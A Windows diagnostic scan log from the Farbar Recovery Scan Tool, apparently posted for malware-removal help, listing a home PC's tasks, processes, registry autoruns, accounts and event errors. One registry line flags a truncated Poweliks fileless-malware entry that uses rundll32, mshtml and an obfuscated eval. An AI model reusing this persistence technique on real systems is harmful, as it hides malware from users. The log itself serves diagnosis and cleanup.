[2014-03-01] (Google Inc.) Task: {1F1F653A-9A63-4693-A116-3801A0037465} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-11] (Adobe Systems Incorporated) Task: {1FC54D89-1B6C-4516-8C55-88DBB102F513} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2014-10-17] (Apple Inc.) Task: {2FB88A66-255E-4A6A-A935-E740E57BAF93} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.) 
Task: {40AC2BF1-F61D-4558-B612-A4BA032B00C7} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation) Task: {4BD843C3-CFEA-40A4-9AE5-9C55460199CA} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation) Task: {4F161FB8-515E-44F8-B090-EBA22AED117E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.) Task: {668ACBED-DED4-49A0-BF68-DEA3DED3165A} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation) Task: {7496BE44-E7B5-4B6D-99ED-83342B76092D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation) Task: {77877023-269F-4E8B-B766-EBB3BC7D4AD1} - System32\Tasks\HP AR Program Upload - b6f1b5de96b0434191ee7a5939bcdd2fed889e11d632473bb14d345dcf17970a => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2014-03-06] (TODO: <Company name>) Task: {7DCE01C5-DA32-4944-9E28-BD300B1CE1CD} - System32\Tasks\Microsoft Office 15 Sync Maintenance for Swintal-PC-Swintal Swintal-PC => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation) Task: {81F4DB92-CFD7-4E7B-AE0E-F77A560732A9} - System32\Tasks\ASUS\i-Setup132150 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.) 
Task: {84E00E03-EFA2-40C3-A897-3B5ED119201A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation) Task: {8BFD38ED-AEEE-4BF9-A623-86D53F843A53} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation) Task: {AE001CD3-A7A1-42E3-9B33-B152E1D23274} - System32\Tasks\ASUS\i-Setup132035 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.) Task: {C9CA414C-B003-452A-9D78-C78A251B18E7} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft) Task: {DB2AFA52-A0DE-4770-BDEA-1CE2AE2C6C30} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {F71B3540-246F-452A-B331-044D7D4C5D0D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation) Task: {FA4859D3-569B-462F-90CE-053288C3DEC7} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-07-23] () Task: {FFAE2AEB-409D-4600-A1EA-B0633B5EC4FF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.) 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2014-03-01 12:32 - 2012-10-29 02:48 - 00927232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe 2014-03-01 16:22 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-03-03 09:26 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2014-10-25 07:48 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll 2014-09-26 11:31 - 2014-09-26 11:31 - 00393376 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream64.dll 2014-02-12 19:58 - 2014-02-12 19:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2014-03-01 12:32 - 2014-11-11 21:30 - 00031232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\PEbiosinterface32.dll 2014-03-01 12:32 - 2012-05-07 11:04 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\ATKEX.dll 2014-10-25 07:48 - 2014-09-09 08:12 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft 
Office\Office15\1033\GrooveIntlResource.dll 2012-09-24 08:24 - 2012-09-24 08:24 - 00020480 _____ () C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\Interfaces.dll 2014-03-02 14:28 - 2013-12-08 20:23 - 00732160 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libGLESv2.dll 2014-03-02 14:28 - 2013-12-08 20:32 - 00854016 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\platforms\qwindows.dll 2014-03-02 14:28 - 2013-12-08 20:23 - 00047104 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libEGL.dll 2014-03-02 14:28 - 2013-12-08 20:31 - 00021504 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\imageformats\qico.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll 2014-01-03 01:59 - 2014-02-10 12:04 - 00430080 _____ () C:\Windows\mod_frst.exe ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:00934A10 AlternateDataStreams: C:\ProgramData\TEMP:74603393 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) 
==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ========================= Accounts: ========================== Administrator (S-1-5-21-4134620719-2527629264-1752102789-500 - Administrator - Disabled) Brian (S-1-5-21-4134620719-2527629264-1752102789-1004 - Limited - Enabled) => C:\Users\Brian Guest (S-1-5-21-4134620719-2527629264-1752102789-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-4134620719-2527629264-1752102789-1003 - Limited - Enabled) Swintal (S-1-5-21-4134620719-2527629264-1752102789-1000 - Administrator - Enabled) => C:\Users\Swintal ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY) Description: Chrome has encountered a fatal error. ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: ) Description: An unspecified error occurred during System Restore: (Installed Navtech PBS). Additional information: 0x80070005. 
Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1 Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712 Exception code: 0x40000015 Fault offset: 0x00000000000324ad Faulting process id: 0x44c Faulting application start time: 0xsvchost.exe_stisvc0 Faulting application path: svchost.exe_stisvc1 Faulting module path: svchost.exe_stisvc2 Report Id: svchost.exe_stisvc3 Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: Flash32_15_0_0_223.ocx, version: 15.0.0.223, time stamp: 0x544ecba4 Exception code: 0xc0000005 Fault offset: 0x005e96c7 Faulting process id: 0x1f28 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7 Exception code: 0xc0000005 Fault offset: 0x000379ed Faulting process id: 0x73c Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: 
iexplore.exe2 Report Id: iexplore.exe3 Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1 Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712 Exception code: 0x40000015 Fault offset: 0x00000000000324ad Faulting process id: 0x538 Faulting application start time: 0xsvchost.exe_stisvc0 Faulting application path: svchost.exe_stisvc1 Faulting module path: svchost.exe_stisvc2 Report Id: svchost.exe_stisvc3 Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (11/11/2014 09:33:35 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/11/2014 09:32:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The Windows Image Acquisition (WIA) service terminated unexpectedly. It has done this 1 time(s). Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Garmin Core Update Service service failed to start due to the following error: %%1053 Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect. 
Error: (11/11/2014 09:09:54 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The IPsec Policy Agent service failed to start due to the following error: %%1053 Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the IPsec Policy Agent service to connect. Error: (11/11/2014 09:07:13 PM) (Source: BugCheck) (EventID: 1001) (User: ) Description: 0x00000024 (0x00000000001904fb, 0xfffff880033385e8, 0xfffff88003337e40, 0xfffff80002eb8c50)C:\Windows\MEMORY.DMP111114-30482-01 Error: (11/11/2014 09:07:13 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: The previous system shutdown at 5:30:10 PM on ‎11/‎11/‎2014 was unexpected. Error: (11/11/2014 04:20:44 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Microsoft Office Sessions: ========================= Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY) Description: Chrome has encountered a fatal error. 
ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: ) Description: Installed Navtech PBS0x80070005 Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad44c01cffe20ca755d39C:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll139dab8c-6a14-11e4-af9d-ac220b2a544f Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7Flash32_15_0_0_223.ocx15.0.0.223544ecba4c0000005005e96c71f2801cffdf6c5f923c7C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Macromed\Flash\Flash32_15_0_0_223.ocx141502f9-69eb-11e4-b41e-ac220b2a544f Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7ntdll.dll6.1.7601.18247521ea8e7c0000005000379ed73c01cffdf55f40e0d4C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dllaa530802-69e8-11e4-b41e-ac220b2a544f Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND 
TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad53801cffdf4e146e30dC:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll2ca5b8e0-69e8-11e4-b41e-ac220b2a544f Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 ==================== Memory info =========================== Processor: Intel® Core i7-4771 CPU @ 3.50GHz Percentage of memory in use: 22% Total physical RAM: 16322.27 MB Available physical RAM: 12717.07 MB Total Pagefile: 32642.72 MB Available Pagefile: 28962.79 MB Total Virtual: 8192 MB Available Virtual: 8191.84 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:931.41 GB) (Free:721.61 GB) NTFS Drive e: (Second Drive) (Fixed) (Total:931.51 GB) (Free:844.12 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: ACBBF63B) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 76A56381) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== End Of Log ============================
  3. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014 Ran by Swintal (administrator) on SWINTAL-PC on 11-11-2014 21:37:28 Running from C:\Users\Swintal\Desktop Loaded Profile: Swintal (Available profiles: Swintal & Brian) Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe () C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe (ESET) C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe (Google Inc.) 
C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\msosync.exe (Microsoft Corporation) C:\Windows\System32\wbengine.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe (Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe (Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe (Google Inc.) C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.) 
C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe (PI Engineering) C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Navigraph) C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Apple Inc.) E:\iTunes\iTunesHelper.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\System32\vds.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleChromeDAV.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7188552 2013-05-27] (Realtek Semiconductor) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2464072 2014-11-06] (NVIDIA Corporation) HKLM\...\Run: [shadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Smart Security\egui.exe [5595336 2014-10-01] (ESET) HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-25] (Intel Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Navigraph FMS Data Manager] => C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe [1006576 2014-06-03] (Navigraph) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.) HKLM-x32\...\Run: [iTunesHelper] => E:\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.) 
HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [HP ENVY 4500 series (NET)] => C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe [3487240 2014-03-06] (Hewlett-Packard Co.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google Update] => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-08-10] (Google Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google+ Auto Backup] => C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe [3746120 2014-08-12] (Google Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [43816 2014-10-20] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! 
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries) Startup: C:\Users\Swintal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MacroWorks 3.1.lnk ShortcutTarget: MacroWorks 3.1.lnk -> C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe (PI Engineering) ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKCU - {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms} BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> 